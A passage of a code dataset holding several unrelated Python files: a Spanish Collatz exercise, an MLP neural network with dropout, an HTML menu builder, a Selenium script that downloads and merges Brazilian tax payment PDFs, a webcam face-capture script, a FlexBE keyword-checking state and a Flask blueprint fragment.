ciclo while.\n# Convertir ciclos definidos verbalmente en código de Python real.\n\n# Escenario\n\n# En 1937, un matemático alemán llamado Lothar Collatz formuló una hipótesis intrigante (aún no se ha comprobado) que se puede describir de la siguiente manera:\n\n# Toma cualquier número entero que no sea negativo y que no sea cero y asígnale el nombre c0.\n# Si es par, evalúa un nuevo c0 como c0 ÷ 2.\n# De lo contrario, si es impar, evalúe un nuevo c0 como 3 × c0 + 1.\n# Si c0 ≠ 1, salta al punto 2.\n\n# La hipótesis dice que, independientemente del valor inicial de c0, el valor siempre tiende a 1.\n\n# Por supuesto, es una tarea extremadamente compleja usar una computadora para probar la hipótesis de cualquier número natural (incluso puede requerir inteligencia artificial), pero puede usar Python para verificar algunos números individuales. Tal vez incluso encuentres el que refutaría la hipótesis.\n\n# Escribe un programa que lea un número natural y ejecute los pasos anteriores siempre que c0 sea diferente de 1. También queremos que cuente los pasos necesarios para lograr el objetivo. Tu código también debe mostrar todos los valores intermedios de c0.\n\n# Sugerencia: la parte más importante del problema es como transformar la idea de Collatz en un ciclo while- esta es la clave del éxito.\n\n# Prueba tu código con los datos que hemos proporcionado.\n# Datos de prueba\n\n# Entrada de muestra: 15\n\n# Salida esperada:\n# 46\n# 23\n# 70\n# 35\n# 106\n# 53\n# 160\n# 80\n# 40\n# 20\n# 10\n# 5\n# 16\n# 8\n# 4\n# 2\n# 1\n# pasos = 17\n\n# Entrada de muestra: 16\n\n# Salida esperada:\n# 8\n# 4\n# 2\n# 1\n# pasos = 4\n\n# Entrada de muestra: 1023\n\n# Salida esperada:\n# 3070\n# 1535\n# 4606\n# 2303\n# 6910\n# 3455\n# 10366\n# 5183\n# 15550\n# 7775\n# 23326\n# 11663\n# 34990\n# 17495\n# 52486\n# 26243\n# 78730\n# 39365\n# 118096\n# 59048\n# 29524\n# 14762\n# 7381\n# 22144\n# 11072\n# 5536\n# 2768\n# 1384\n# 692\n# 346\n# 173\n# 520\n# 260\n# 130\n# 65\n# 196\n# 98\n# 49\n# 148\n# 74\n# 37\n# 112\n# 56\n# 28\n# 14\n# 7\n# 22\n# 11\n# 34\n# 17\n# 52\n# 26\n# 13\n# 40\n# 20\n# 10\n# 5\n# 16\n# 8\n# 4\n# 2\n# 1\n# pasos = 62\n\nc0 = int (input(\"Ingrese c0:\"))\n\nif c0 > 1:\n pasos = 0\n while c0 != 1:\n if c0 % 2 != 0:\n cnew = 3 * c0 + 1\n else:\n cnew = c0 // 2\n print(c0)\n c0 = cnew\n pasos += 1\n print(\"pasos =\", pasos)\nelse:\n print(\"Valor de c0 incorrecto\")","sub_path":"curso-python/lab/collatz.py","file_name":"collatz.py","file_ext":"py","file_size_in_byte":2529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"338427797","text":"###############################################################################\n# The MIT License (MIT)\n#\n# Copyright (c) 2017 Justin Lovinger\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n###############################################################################\n\nimport random\nimport copy\nimport functools\nimport operator\n\nimport numpy\n\nfrom learning import calculate, optimize\nfrom learning import Model, LinearTransfer, ReluTransfer, MeanSquaredError\nfrom learning.transfer import Transfer\nfrom learning.optimize import Problem, SteepestDescent\n\nINITIAL_WEIGHTS_RANGE = 0.25\n\n\n# TODO: Add support for penalty functions\nclass MLP(Model):\n \"\"\"MultiLayer Perceptron\n\n Args:\n shape: Number of inputs, followed by number of outputs of each layer.\n Shape of each weight matrix is given by sequential pairs in shape.\n transfers: Optional. List of transfer layers.\n Can be given as a single transfer layer to easily define output transfer.\n Defaults to ReLU hidden followed by linear output.\n optimizer: Optimizer; Optimizer used to optimize weight matrices.\n error_func: ErrorFunc; Error function for optimizing weight matrices.\n jacobian_norm_break: Training will end if objective gradient norm\n is less than this value.\n \"\"\"\n\n def __init__(self,\n shape,\n transfers=None,\n optimizer=None,\n error_func=None,\n jacobian_norm_break=1e-10):\n super(MLP, self).__init__()\n\n if transfers is None:\n transfers = [ReluTransfer() for _ in range((len(shape) - 2))\n ] + [LinearTransfer()]\n elif isinstance(transfers, Transfer):\n # Treat single given transfer as output transfer\n transfers = [ReluTransfer()\n for _ in range((len(shape) - 2))] + [transfers]\n\n if len(transfers) != len(shape) - 1:\n raise ValueError(\n 'Must have exactly 1 transfer between each pair of layers, and after the output'\n )\n\n self._shape = shape\n\n self._bias_vec = self._random_weight_matrix(\n shape[1]) # Number of outputs of first layer\n self._weight_matrices = []\n self._setup_weight_matrices()\n self._transfers = transfers\n\n # Parameter optimization for training\n if optimizer is None:\n optimizer = optimize.make_optimizer(\n sum([\n reduce(operator.mul, weight_matrix.shape)\n for weight_matrix in self._weight_matrices\n ]))\n\n self._optimizer = optimizer\n\n # Error function for training\n if error_func is None:\n error_func = MeanSquaredError()\n self._error_func = error_func\n\n # Convergence criteria\n self._jacobian_norm_break = jacobian_norm_break\n\n # Activation vectors\n # 1 for input, then 2 for each hidden and output (1 for transfer, 1 for perceptron))\n # To help with jacobian calculation\n self._weight_inputs = [None]*(len(self._shape))\n self._transfer_inputs = [None]*(len(self._shape)-1)\n\n self.reset()\n\n def _setup_weight_matrices(self):\n \"\"\"Initialize weight matrices.\"\"\"\n self._weight_matrices = []\n num_inputs = self._shape[0]\n for num_outputs in self._shape[1:]:\n self._weight_matrices.append(\n self._random_weight_matrix((num_inputs, num_outputs)))\n num_inputs = num_outputs\n\n def _random_weight_matrix(self, shape):\n \"\"\"Return a random weight matrix.\"\"\"\n # TODO: Random weight matrix should be a function user can pass in\n return (2 * numpy.random.random(shape) - 1) * INITIAL_WEIGHTS_RANGE\n\n def reset(self):\n \"\"\"Reset this model.\"\"\"\n super(MLP, self).reset()\n\n self._setup_weight_matrices()\n self._bias_vec = self._random_weight_matrix(self._shape[1])\n\n self._optimizer.reset()\n\n def activate(self, input_tensor):\n \"\"\"Return the model outputs for given input_tensor.\"\"\"\n # Make sure input_tensor is a numpy array, for consistency\n if not isinstance(input_tensor, numpy.ndarray):\n input_tensor = numpy.array(input_tensor)\n\n try:\n if input_tensor.shape[-1] != self._shape[0]:\n raise ValueError('input_tensor attributes == %s, expected %s' %\n (input_tensor.shape[-1], self._shape[0]))\n except AttributeError: # Not numpy array\n # Do not check shape\n pass\n\n self._weight_inputs[0] = input_tensor\n # First part includes bias vector\n self._transfer_inputs[0] = numpy.dot(\n self._weight_inputs[0], self._weight_matrices[0]) + self._bias_vec\n self._weight_inputs[1] = self._transfers[0](self._transfer_inputs[0])\n\n for i, (weight_matrix, transfer_func) in list(\n enumerate(zip(self._weight_matrices, self._transfers)))[1:]:\n # Track all activations for learning, and layer inputs\n self._transfer_inputs[i] = numpy.dot(self._weight_inputs[i],\n weight_matrix)\n self._weight_inputs[i + 1] = transfer_func(\n self._transfer_inputs[i])\n\n # Return activation of the only layer that feeds into output\n return numpy.copy(self._weight_inputs[-1])\n\n def train_step(self, input_matrix, target_matrix):\n \"\"\"Adjust the model towards the targets for given inputs.\n\n Train on a mini-batch.\n \"\"\"\n error, flat_weights = self._optimizer.next(\n Problem(\n obj_func=\n lambda xk: self._get_obj(xk, input_matrix, target_matrix),\n obj_jac_func=\n lambda xk: self._get_obj_jac(xk, input_matrix, target_matrix)),\n _flatten(self._bias_vec, self._weight_matrices))\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n flat_weights, self._shape)\n\n self.converged = self._optimizer.jacobian is not None and numpy.linalg.norm(\n self._optimizer.jacobian) < self._jacobian_norm_break\n return error\n\n def _post_train(self, input_matrix, target_matrix):\n \"\"\"Call after Model.train.\n\n Optional.\n \"\"\"\n # Reset optimizer, because problem may change on next train call\n self._optimizer.reset()\n\n ######################################\n # Helper functions for optimizer\n ######################################\n def _get_obj(self, parameter_vec, input_matrix, target_matrix):\n \"\"\"Helper function for Optimizer to get objective value.\"\"\"\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n parameter_vec, self._shape)\n return self._error_func(self.activate(input_matrix), target_matrix)\n\n\n def _get_obj_jac(self, parameter_vec, input_matrix, target_matrix):\n \"\"\"Helper function for Optimizer to get objective value and derivative.\"\"\"\n self._bias_vec, self._weight_matrices = _unflatten_weights(\n parameter_vec, self._shape)\n # Return error and flattened jacobians\n return (lambda obj, vec, jac: (obj, _flatten(vec, jac)))(\n *self._get_jacobians(input_matrix, target_matrix))\n\n ######################################\n # Objective Derivative\n ######################################\n def _get_jacobians(self, input_matrix, target_matrix):\n \"\"\"Return overall error, bias jacobian, and jacobian matrix for each weight matrix.\"\"\"\n # Calculate derivative with regard to each weight matrix\n # d/dW_n e(MLP(X), Y) = f_{n-1}(...(f_1(X W_1 + b)...)W_{n-1}) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)\n # d/dW_{n-1} e(MLP(X), Y) = f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2}) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1})\n # ...\n # d/dW_1 e(MLP(X), Y) = X e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... W_2^T f_1(X W_1 + b)\n # d/db e(MLP(X), Y) = \\vec{1}^T e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n) W_n^T f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... W_2^T f_1(X W_1 + b)\n\n # We can re-arrange above derivatives for clarity\n # HOWEVER, because matrix operations are non-commutative\n # the re-arranged derivatives are not correct for implementation\n # NOTE (WARNING): Below is not accurate\n # and is only provided to clarify variables involved\n # d/dw_n e(MLP(X), Y) = f_{n-1}(...(f_1(X W_1 + b)...)W_{n-1}) f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # d/dw_{n-1} e(MLP(X), Y) = W_n f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2}) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # ...\n # d/dw_1 e(MLP(X), Y) = X W_2 ... W_n f_1'(X W_1 + b) ... f_2'(f_1(X W_1 + b)W_2) ... f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n # d/db e(MLP(X), Y) = \\vec{1}^T W_2 ... W_n f_1'(X W_1 + b) ... f_2'(f_1(X W_1 + b)W_2) ... f_n'(...(f_1(X W_1 + b)...)W_n) e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n\n output_matrix = self.activate(input_matrix)\n\n # Error and error derivative: e'(mlp(X), Y) = e'(f_n(...(f_1(X W_1 + b)...)W_n), Y)\n error, error_jac = self._error_func.derivative(output_matrix,\n target_matrix)\n\n # Calculate a series of partial jacobians (from d/dW_n to d/dW_1).\n # These jacobians include everything except the final f_{i-1}(...(f_1(X W_1 + b)...)W_{i-1}) (or X for d/W_1)\n # multiplication with partial jacobian corresponding to d/dW_i\n # For d/dW_n: e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)\n # For d/dW_{n-1}: ((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1})\n # For d/dW_{n-2}: (((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) W_{n-1}^T) f_{n-2}(...(f_1(X W_1 + b)...)W_{n-2})\n # ...\n # For d/dW_1: ((((e'(f_n(...(f_1(X W_1 + b)...)W_n), Y) f_n'(...(f_1(X W_1 + b)...)W_n)) W_n^T) f_{n-1}'(...(f_1(X W_1 + b)...)W_{n-1}) ... ) W_2^T) f_1'(X W_1 + b)\n\n # TODO: Add optimization for cross entropy and softmax output (just o - t)\n # Derivative of error_vec w.r.t. output transfer\n partial_jacobians = [\n _dot_diag_or_matrix(error_jac, self._transfers[-1].derivative(\n self._transfer_inputs[-1], self._weight_inputs[-1]))\n ]\n for weight_matrix, transfer_func, transfer_inputs, weight_inputs in reversed(\n zip(self._weight_matrices[1:], self._transfers[:-1],\n self._transfer_inputs[:-1], self._weight_inputs[1:])):\n partial_jacobians.append(\n _dot_diag_or_matrix(partial_jacobians[-1].dot(weight_matrix.T),\n transfer_func.derivative(\n transfer_inputs, weight_inputs)))\n # Reverse so partial_jacobians[0] corresponds to d/dW_1\n partial_jacobians = list(reversed(partial_jacobians))\n\n # Finalize jacobian for each weight matrix\n # by multiplying final f_{i-1}(...(f_1(X W_1 + b)...)W_{i-1}) (or X for d/W_1)\n # with partial jacobian corresponding to d/dW_i\n # NOTE: self._weight_inputs[-1] is model output\n assert len(self._weight_inputs) - 1 == len(partial_jacobians)\n jacobians = [\n weight_inputs.T.dot(error_matrix)\n for weight_inputs, error_matrix in zip(self._weight_inputs[:-1],\n partial_jacobians)\n ]\n\n # Bias is \\vec{1}^T times partial jacobian (instead of inputs X)\n return error, numpy.sum(partial_jacobians[0], axis=0), jacobians\n\n\ndef _dot_diag_or_matrix(tensor_a, tensor_b):\n \"\"\"Dot tensor_a with either tensor_b of diagonals or full jacobian.\n\n For efficiency, transfer derivatives can return either a vector corresponding\n to the diagonals of a jacobian, or a full jacobian.\n Or a matrix or 3 tensor of the above.\n The diagonal must be multiplied element-wise, which is equivalent to\n a dot product with a diagonal matrix.\n \"\"\"\n if tensor_a.shape == tensor_b.shape: # tensor_b is only diagonals of transfer jacobian\n return tensor_a * tensor_b\n else:\n # dot each row of tensor_a with each row of tensor_b (which is a matrix jacobian),\n # using Einstein summation\n # Because tensor_b is actually a list of jacobians of each row of its given matrix,\n # instead of a full jacobian.\n return numpy.einsum('ij,ijk->ik', tensor_a, tensor_b)\n\n\ndef _mean_list_of_list_of_matrices(lol_matrices):\n \"\"\"Return mean of each matrix in list of lists of matrices.\"\"\"\n # Sum matrices\n mean_matrices = lol_matrices[0]\n for list_of_matrices in lol_matrices[1:]:\n for i, matrix in enumerate(list_of_matrices):\n mean_matrices[i] += matrix\n\n # Divide each by number of lists of matrices\n for matrix in mean_matrices:\n matrix /= len(lol_matrices)\n\n # Return list of mean matrices\n return mean_matrices\n\ndef _flatten(bias_vec, weight_matrices):\n \"\"\"Flatten bias vector and weight matrices into flat vector.\"\"\"\n return numpy.hstack([bias_vec] + [matrix.ravel() for matrix in weight_matrices])\n\n\ndef _unflatten_weights(flat_weights, shape):\n \"\"\"Unravel flat_weights into bias vector and weight matrices.\"\"\"\n bias_vec = flat_weights[:shape[1]]\n matrices = []\n index = shape[1]\n for i, j in zip(shape[:-1], shape[1:]):\n matrices.append(flat_weights[index:index + (i * j)].reshape((i, j)))\n index += (i * j)\n\n return bias_vec, matrices\n\n\nclass DropoutMLP(MLP):\n def __init__(self,\n shape,\n transfers=None,\n optimizer=None,\n error_func=None,\n input_active_probability=0.8,\n hidden_active_probability=0.5):\n if optimizer is None:\n # Don't use BFGS for Dropout\n # BFGS cannot effectively approximate hessian when problem\n # is constantly changing\n optimizer = SteepestDescent()\n\n super(DropoutMLP, self).__init__(shape, transfers, optimizer,\n error_func)\n\n # Dropout hyperparams\n self._inp_act_prob = input_active_probability\n self._hid_act_prob = hidden_active_probability\n\n # We modify transfers to disable hidden neurons\n # To disable inputs, we need a transfer for the input vector\n # To re-enable hidden neurons, we need to remember the original transfers\n self._input_transfer = LinearTransfer()\n self._real_transfers = self._transfers\n\n # We perform the post-training procedure on the first activation after training\n self._during_training = False\n self._did_post_training = True\n\n def activate(self, input_tensor):\n \"\"\"Return the model outputs for given inputs.\"\"\"\n # Perform post-training procedure on the first activate after training.\n # If done during train method, post-training will not occur when model is used\n # incrementally\n if (not self._during_training) and (not self._did_post_training):\n self._post_training()\n self._did_post_training = True\n\n # Use input transfer to disable inputs (during training)\n return super(DropoutMLP,\n self).activate(self._input_transfer(input_tensor))\n\n def _post_training(self):\n # Activate all inputs\n self._input_transfer = LinearTransfer()\n\n # Activate all hidden\n self._transfers = self._real_transfers\n\n # Adjust weight matrices, based on active probabilities\n # TODO: Do we need to adjust any weights based on self._inp_act_prob?\n for i, _ in enumerate(self._weight_matrices):\n self._weight_matrices[i] *= self._hid_act_prob\n\n def train_step(self, input_matrix, target_matrix):\n \"\"\"Adjust the model towards the targets for given inputs.\n\n Train on a mini-batch.\n \"\"\"\n # Enter training mode\n self._during_training = True\n self._did_post_training = False\n\n # Disable inputs\n self._input_transfer = DropoutTransfer(\n LinearTransfer(), self._inp_act_prob, self._shape[0])\n\n # Disable hidden neurons\n self._disable_hiddens()\n\n error = super(DropoutMLP, self).train_step(input_matrix, target_matrix)\n\n # No longer in training mode\n self._during_training = False\n\n return error\n\n def _disable_hiddens(self):\n \"\"\"Disable random neurons in hidden layers.\"\"\"\n dropout_transfers = []\n\n # Don't disable output neurons\n for transfer_func, num_neurons in zip(self._real_transfers[:-1],\n self._shape[1:-1]):\n dropout_transfers.append(\n DropoutTransfer(transfer_func, self._hid_act_prob,\n num_neurons))\n\n # Use original output transfer\n dropout_transfers.append(self._real_transfers[-1])\n\n self._transfers = dropout_transfers\n\n\n################################################\n# Transfer functions\n################################################\nclass DropoutTransfer(Transfer):\n def __init__(self, transfer_func, active_probability, num_neurons):\n self._transfer = transfer_func\n self._active_neurons = _get_active_neurons(active_probability,\n num_neurons)\n\n def __call__(self, input_tensor):\n return self._transfer(input_tensor) * self._active_neurons\n\n def derivative(self, input_tensor, output_vec):\n \"\"\"Return the derivative of this function.\n\n We take both input and output vector because\n some derivatives can be more efficiently calculated from\n the output of this function.\n \"\"\"\n return self._transfer.derivative(input_tensor, output_vec)\n\n\ndef _get_active_neurons(active_probability, num_neurons):\n \"\"\"Return list of active neurons.\"\"\"\n if active_probability <= 0.0 or active_probability > 1.0:\n raise ValueError('0 < active_probability <= 1')\n\n active_neurons = [\n 1.0 if random.uniform(0, 1) < active_probability else 0.0\n for _ in range(num_neurons)\n ]\n\n # Do not allow none active\n if 1.0 not in active_neurons:\n active_neurons[random.randint(0, len(active_neurons) - 1)] = 1.0\n\n return numpy.array(active_neurons)\n","sub_path":"learning/architecture/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":20067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"365952149","text":"import webbrowser\nimport os\nfrom src.models.menu import *\nfrom src.models.menu_item import *\nfrom src.models.analisis_item import *\nfrom src.proyecto_singleton import *\nfrom decimal import Decimal\n\nclass HelperMenu:\n\n def analize_items(self, items, maxim):\n menu = Menu()\n menu.set_name(self.get_menu_name(items))\n menu.set_item(self.get_menu_options(items))\n ProyectoSingleton().menu = menu\n self.build_html(menu, maxim)\n\n def get_menu_name(self, items):\n i = 0\n menu_name = \"\"\n while i < len(items):\n item = items[i]\n \n try:\n if item.get_token() == \"tk_restaurant\":\n if items[i + 1].get_token() == \"tk_asign\":\n if items[i + 2].get_token() == \"tk_string\":\n menu_name = items[i + 2].get_lexema()\n \n except Exception as e:\n if menu_name != \"\":\n break\n i += 1\n\n return menu_name\n\n def get_menu_options(self, items):\n i = 0\n items_dict = {}\n item_name = \"\"\n while i < len(items):\n \n try:\n if items[i].get_token() == \"tk_dp\":\n if items[i - 1].get_token() == \"tk_string\":\n item_name = items[i - 1].get_lexema()\n items_dict[item_name] = []\n \n elif items[i].get_token() == \"tk_corC\":\n if items[i - 1].get_token() == \"tk_string\":\n if items[i - 2].get_token() == \"tk_pc\":\n if items[i - 3].get_token() == \"tk_num\":\n if items[i - 4].get_token() == \"tk_pc\":\n if items[i - 5].get_token() == \"tk_string\":\n if items[i - 6].get_token() == \"tk_pc\":\n if items[i - 7].get_token() == \"tk_id\":\n if items[i - 8].get_token() == \"tk_corA\":\n if item_name != \"\":\n m_item = MenuItem()\n m_item.set_item_id(items[i-7].get_lexema())\n m_item.set_name(items[i-5].get_lexema())\n m_item.set_price(items[i-3].get_lexema())\n m_item.set_description(items[i-1].get_lexema())\n items_dict[item_name].append(m_item)\n except Exception as e:\n i += 1\n continue\n\n i += 1\n return items_dict\n\n def build_html(self, data, maxim):\n generated = False\n\n m_name = data.get_name()\n\n item = ''''''\n for key, values in data.get_items().items():\n item += '''\n
\n

''' + key.strip(\"'\") + '''

'''\n for value in values:\n if maxim == -1:\n item += '''
\n

''' + value.get_name().strip(\"'\") + ''' - Q''' + str(round(Decimal(value.get_price()), 2)) + '''

\n

''' + value.get_description().strip(\"'\") + '''

\n
'''\n elif round(Decimal(value.get_price()), 2) <= Decimal(maxim):\n item += '''
\n

''' + value.get_name().strip(\"'\") + ''' - Q''' + str(round(Decimal(value.get_price()), 2)) + '''

\n

''' + value.get_description().strip(\"'\") + '''

\n
'''\n item += '''
'''\n\n html = '''\n \n \n \n \n \n Menu\n \n \n \n
\n
\n
\n
\n

''' + m_name.strip(\"'\") + '''

\n
\n ''' + item + '''\n
\n \n
\n
\n \n \n '''\n\n file = open('menu.html', 'w')\n file.write(html)\n file.close()\n filename = 'file://' + os.path.realpath(file.name)\n webbrowser.open_new_tab(filename)\n generated = True\n return generated\n","sub_path":"commons/helper_menu.py","file_name":"helper_menu.py","file_ext":"py","file_size_in_byte":5820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"146036200","text":"import time, datetime\nimport sys,os, shutil, csv, getpass\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nfrom PyPDF2 import PdfFileMerger\nfrom PyPDF2 import PdfFileWriter\nfrom PyPDF2 import PdfFileReader\nfrom tkinter import *\nfrom functools import partial\n\n\n\n\nini=''\nfim=''\n\ndef envio(envio):\n global ini\n ini = dIni.get()\n global fim\n fim = dFim.get()\n janela.quit()\n janela.destroy()\n\n\njanela = Tk()\njanela.title('Definir data de busca')\n\n##botaão\nbt = Button(janela, width=10, text=\"OK\")\nbt['command']=partial(envio, bt)\nbt.place(x=120, y=150)\n\n##dateini\ntdIni = Label(janela, text=\"Data Inicio:\")\ntdIni.place(x=20,y=47)\ndIni = Entry(janela)\ndIni.place(x=110,y=50)\n\n##datefim\ntdFim = Label(janela, text=\"Data Fim:\")\ntdFim.place(x=20,y=87)\ndFim = Entry(janela)\ndFim.place(x=110,y=90)\n\njanela.geometry('300x200+200+200')\n\njanela.mainloop()\n##FIM da janela\nuser = getpass.getuser()\nlpath=[]\nn=0\npath = 'C:/Users/'+user+'/Downloads/PagtoWebImpREST.pdf'\npath1 = 'C:/Users/'+user+'/Desktop/pdfs/'\nf=\"\"\ns=\"\"\n\nif not os.path.exists(path1):\n os.makedirs(path1)\n\ndriver = webdriver.Chrome()\ndriver.get(\"https://cav.receita.fazenda.gov.br/ecac/Default.aspx\")\n\nprint(driver.title)\n\nelement = driver.find_element_by_xpath(\"\"\"//*[@id=\"caixa-login-certificado\"]\"\"\")\nelement.click()\ntime.sleep(5)\n\ndriver.get(\"https://cav.receita.fazenda.gov.br/Servicos/ATFLA/PagtoWeb.app/Default.aspx\")\n\ntime.sleep(6)\ndtAi = driver.find_element_by_xpath(\"\"\"//*[@id=\"campoDataArrecadacaoInicial\"]\"\"\")\ndtAi.send_keys(ini)\n\nif not fim==\"\":\n dtAf = driver.find_element_by_xpath('//*[@id=\"campoDataArrecadacaoFinal\"]')\n dtAf.send_keys(fim)\n\nbtConsulta = driver.find_element_by_xpath(\"\"\"//*[@id=\"botaoConsultar\"]\"\"\")\nbtConsulta.click()\n\n\nfor i in driver.find_elements_by_xpath('//*[@class=\"icon print\"]'):\n i.click()\n n=n+1\n while not os.path.exists(path):\n time.sleep(1)\n w = open(path,'r+b')\n f =w.read()\n s=f.find(b'%%EOF')\n o=s+5\n f=f.replace(f[o:],b'')\n w.write(f)\n w.close()\n time.sleep(2)\n t=str(n)+\".pdf\"\n os.rename('C:/Users/'+user+'/Downloads/PagtoWebImpREST.pdf',t)\n shutil.move(t,path1)\n\n\ntime.sleep(1)\nfile=\"\"\nfor files in os.listdir(path1):\n lpath.append(path1+files)\n\nmerger = PdfFileMerger()\n\nfor f in lpath:\n print(f)\n merger.append(f)\n\nmerger.write(path1+\"2017.pdf\")\n\n#//*[@id=\"listagemDARF_ctl0\"\"\"+2+\"\"\"_btnVisualizar\"]\"\"\"\n","sub_path":"buts/buts/DARFS/darfs.py","file_name":"darfs.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"636807107","text":"import cv2 \nimport face_recognition\n\ncamera = cv2.VideoCapture(0) \ncounter=0\n\nwhile 1:\n ret, img = camera.read()\n \n face_locations = face_recognition.face_locations(img)\n \n \n for face_location in face_locations:\n top, right, bottom, left = face_location\n\n # You can access the actual face itself like this:\n face_image = img[top:bottom, left:right]\n \n cv2.imwrite(\"yuz.jpeg\", face_image) \n counter+=1\n break\n \n\n if counter !=0:\n break\n \n cv2.imshow('img',img)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break \n \n# Close the window \ncamera.release() \n# De-allocate any associated memory usage \ncv2.destroyAllWindows() \n","sub_path":"Projects/2_2CameraToImage.py","file_name":"2_2CameraToImage.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"607259803","text":"#!/usr/bin/env python\n\nimport rospy\nfrom flexbe_core import EventState, Logger\n\n'''\nCreated on 02/24/2015\n\n@author: Philipp Schillinger\n'''\n\nclass WordCheckingState(EventState):\n\t'''\n\tChecks if the given condition is true and returns the corresponding outcome.\n\tThis state can be used if the further control flow of the behavior depends on a simple condition.\n\t\n\t-- predicate function\tThe condition whose truth value will be evaluated.\n\t\t\t\t\t\t\t\tHas to expect one parameter which will be set to input_value and return a boolean.\n\n\t># input_value\tobject\t\tInput to the predicate function.\n\n\t<= true \t\t\t\t\tReturned if the condition evaluates to True\n\t<= false \t\t\t\t\tReturned if the condition evaluates to False\n\t\n\t'''\n\n\tdef __init__(self,key_word):\n\t\t'''Constructor'''\n\t\tsuper(WordCheckingState, self).__init__(outcomes=['found', 'not_found'],\n\t\t\t\t\t\t\t\t\t\t\t\t\tinput_keys=['input_value'])\n\t\t\n\t\tself._key_word = key_word\n\t\t# self._message_location = message_location\n\t\tself._outcome = 'not_found'\n\t\t\n\tdef execute(self, userdata):\n\t\t'''Execute this state'''\n\n\t\treturn self._outcome\n\t\t\n\tdef on_enter(self, userdata):\n\t\ttry:\t\n\t\t\tself._key_word = self._key_word.lower()\n\t\t\tLogger.logwarn(\"got this:\")\n\t\t\tLogger.logwarn(userdata.input_value)\n\t\t\t\n\n\t\t\t# self._outcome = 'found' if self._predicate(userdata.input_value) else 'not found'\n\t\t\tLogger.logwarn(\"input message from subscriber: \" + userdata.input_value.lower())\n\t\t\tLogger.logwarn(\"im looking through last phrase for the word: \" + self._key_word)\n\t\t\tself._outcome = 'found' if self._key_word in userdata.input_value.lower() else 'not_found'\n\t\t\tif self._key_word in userdata.input_value.lower():\n\n\t\t\t\tprint(\"found the word \" + self._key_word)\n\t\t\t\tLogger.logwarn(\"found the word \" + self._key_word)\n\t\t\telse:\n\t\t\t\tprint(\"did not find the word \" + self._key_word)\n\t\t\t\tLogger.logwarn(\"didn't find the word \" + self._key_word + \" only got this: \" + userdata.input_value.lower())\n\n\t\texcept Exception as e:\n\t\t\tLogger.logwarn('Failed to execute condition function!\\n%s' % str(e))\n","sub_path":"robot_brain_flexbe_states/src/robot_brain_flexbe_states/word_check_state.py","file_name":"word_check_state.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"163249288","text":"from flask import Blueprint, render_template, request, redirect\nfrom utils.Db import Db\n\nanasayfa = Blueprint('anasayfa',__name__,\n url_prefix=\"/anasayfa\")\n\ndef sort(val):\n return val[3]\n\n@anasayfa.route(\"/\")\ndef index():\n databse = Db()\n sql = \"\"\" select * from \"BlogYazisi\" \"\"\"\n data = databse.read_data(sql)\n data.sort(key = sort, reverse = True)\n return render_template(\"anasayfa/index.html\", data=data)\n\n@anasayfa.route(\"/\")\ndef tekIndexGoster(id):\n database = 